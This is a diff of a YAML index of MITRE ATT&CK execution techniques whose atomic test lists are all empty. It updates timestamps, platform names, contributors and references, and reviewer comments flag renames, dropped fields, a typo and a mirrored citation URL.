identifier: T1106
atomic_tests: []
T1059.010:
technique:
- modified: '2024-04-10T16:05:22.456Z'
+ modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
- These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+ These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
@@ -25445,7 +25759,7 @@ execution:
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- - Monty
+ - "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -25482,11 +25796,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:44:20.143Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
@@ -25523,11 +25836,10 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
x_mitre_remote_support: false
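Review bot: the platform list for T1059.009 drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider`, and the same rename is applied to T1059 further down. Anything that selects tests from this index by the old platform names will silently get an empty result after this change; make sure any platform-filtered views or consumers are regenerated or updated in the same change.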
@@ -25546,13 +25858,12 @@ execution:
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25631,12 +25942,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1059:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Command and Scripting Interpreter
description: |-
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25647,6 +25957,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25657,16 +25968,16 @@ execution:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- - Office 365
- - Azure AD
- IaaS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Script: Script Execution'
- 'Process: Process Creation'
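Review bot: the platform list for T1059 replaces `Office 365`, `Azure AD` and `Google Workspace` with `Office Suite` and `Identity Provider`, which is a taxonomy change rather than a data refresh; any index file or filter keyed on the old platform strings will silently lose this technique unless it is regenerated in the same change. The bump from `2.4` to `2.5` in the same hunk suggests this mirrors an upstream ATT&CK release; saying so in the commit message would help anyone later tracing why rows disappeared from a platform index.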
@@ -25697,14 +26008,11 @@ execution:
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059
atomic_tests: []
T1609:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:25:45.507Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25770,39 +26078,13 @@ execution:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1609
atomic_tests: []
T1569.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
- type: attack-pattern
- created: '2020-03-10T18:26:56.187Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569.001
- url: https://attack.mitre.org/techniques/T1569/001
- - source_name: Launchctl Man
- url: https://ss64.com/osx/launchctl.html
- description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
- - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
- Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- source_name: Sofacy Komplex Trojan
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-20T20:14:35.179Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25811,6 +26093,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
plist file on disk which can be monitored. Monitor for recently modified or
created plist files with a significant change to the executable path executed
@@ -25823,19 +26106,42 @@ execution:
are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
the services are unloaded prior to deleting plist files."
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- 'Service: Service Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+ created: '2020-03-10T18:26:56.187Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569/001
+ external_id: T1569.001
+ - source_name: Sofacy Komplex Trojan
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ - source_name: Launchctl Man
+ description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+ url: https://ss64.com/osx/launchctl.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1569.001
atomic_tests: []
T1059.008:
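Review bot: `x_mitre_permissions_required` (`User`, `root`) disappears from T1569.001 in this hunk with no replacement, while everything else in the block is only reordered; if this follows the spec bump to `3.2.0` that is fine, but it is a field loss rather than a move, so confirm nothing downstream (index generation, a permissions column in a CSV) still reads it. The four `external_references` deleted in the earlier hunk all reappear here with only the `url` / `external_id` / `description` order changed, so that part is a pure reorder.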
@@ -25878,7 +26184,7 @@ execution:
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T20:28:09.848Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Device CLI
x_mitre_detection: |-
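Review bot: the `modified` timestamp for T1059.008 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-19T20:28:09.848Z`, and the following hunk leaves this object on `x_mitre_attack_spec_version: 2.1.0` while its neighbours move to `3.2.0`; that pattern usually means the object was regenerated from an older STIX bundle than the rest. Check which source the generator read for this technique before merging.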
@@ -25894,72 +26200,75 @@ execution:
x_mitre_remote_support: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1559.003:
technique:
- x_mitre_platforms:
- - macOS
+ modified: '2024-10-16T16:14:12.793Z'
+ name: XPC Services
+ description: |-
+ Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+ Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_contributors:
+ - Csaba Fitzl @theevilbit of Kandji
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Csaba Fitzl @theevilbit of Offensive Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ x_mitre_remote_support: false
type: attack-pattern
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
- x_mitre_version: '1.0'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1559.003
url: https://attack.mitre.org/techniques/T1559/003
+ external_id: T1559.003
- source_name: creatingXPCservices
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
description: Apple. (n.d.). Retrieved October 12, 2021.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
- url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
+ url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
- url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
- Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XPC Services
- x_mitre_detection: ''
- kill_chain_phases:
- - phase_name: execution
- kill_chain_name: mitre-attack
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Process: Process Access'
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204:
technique:
- modified: '2024-04-12T03:46:49.507Z'
+ modified: '2024-11-11T18:52:12.103Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ Adversaries may also deceive users into performing actions such as:
+
+ * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+ * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+ * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
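Review bot: the new T1204 bullet `Coerceing users to copy, paste, and execute malicious code manually` has a typo (`Coercing`), and the paragraph beginning `For example, tech support scams` follows the last bullet with no blank line, so in Markdown it renders as a lazy continuation of that list item rather than a new paragraph; add a blank `+` line before it, as was done between the lead-in sentence and the list. Two smaller points in the same hunk: in the T1559.003 description the lines `or the high level NSXPCConnection API` and `in order to handle tasks that require elevated privileges` carry no `+`/`-` marker in either the removed or the added copy, so the literal block scalar should be checked in the file to make sure no inline markup was lost in the move; and the contributor line changes from `Csaba Fitzl @theevilbit of Offensive Security` to `... of Kandji`, a content edit worth a mention in the commit message.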
@@ -25967,7 +26276,11 @@ execution:
phase_name: execution
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- - Goldstein Menachem
+ - Menachem Goldstein
+ - Harikrishnan Muthu, Cyble
+ - ReliaQuest
+ - Ale Houspanossian
+ - Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -25982,7 +26295,7 @@ execution:
- macOS
- IaaS
- Containers
- x_mitre_version: '1.6'
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Instance: Instance Start'
- 'File: File Creation'
@@ -26009,6 +26322,10 @@ execution:
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+ - source_name: Reliaquest-execution
+ description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+ Campaign. Retrieved August 2, 2024.
+ url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
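Review bot: the new reference's `description` spells the vendor `Reliaquest` while the contributor added earlier in this patch is `ReliaQuest`; pick one spelling (the vendor's own is ReliaQuest). The `source_name` `Reliaquest-execution` must stay exactly as written, since `(Citation: ...)` tags in the T1204 description match it literally.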
@@ -26019,15 +26336,19 @@ execution:
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
+ - source_name: proofpoint-selfpwn
+ description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+ From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+ 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -26044,7 +26365,7 @@ execution:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -26092,7 +26413,7 @@ execution:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -26125,12 +26446,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1059.001:
technique:
- modified: '2024-03-01T18:01:37.575Z'
+ modified: '2024-10-15T16:39:13.228Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process
cmdlet which can be used to run an executable and the Invoke-Command
cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -26191,8 +26511,9 @@ execution:
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
- description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
- url: https://github.com/jaredhaight/PSAttack
+ description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+ 2024.
+ url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
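Review bot: the `Github PSAttack` reference URL changes from the author's repository `https://github.com/jaredhaight/PSAttack` to `https://github.com/Exploit-install/PSAttack-1`, a third-party copy, while the `description` still credits Haight, J.; a citation that points at a mirror outside the cited author's control is a weak provenance link, because the mirror's contents can diverge from what was originally cited. If the original repository is gone, prefer a Wayback Machine snapshot of the original URL, or state in the description that the link is a mirror.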
@@ -26214,12 +26535,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.001
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26297,14 +26617,13 @@ execution:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1059.004:
technique:
- modified: '2024-04-16T12:24:40.163Z'
+ modified: '2024-10-15T15:17:19.136Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26362,36 +26681,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.004
atomic_tests: []
T1559:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- created: '2020-02-12T14:08:48.689Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- - source_name: Linux IPC
- url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
- description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
- March 11, 2022.
- - source_name: Fireeye Hunting COM June 2019
- url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
- 10, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-10T19:06:35.666Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
@@ -26412,25 +26706,110 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Process: Process Access'
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ created: '2020-02-12T14:08:48.689Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1559
+ external_id: T1559
+ - source_name: Fireeye Hunting COM June 2019
+ description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+ 10, 2019.
+ url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+ - source_name: Linux IPC
+ description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+ March 11, 2022.
+ url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
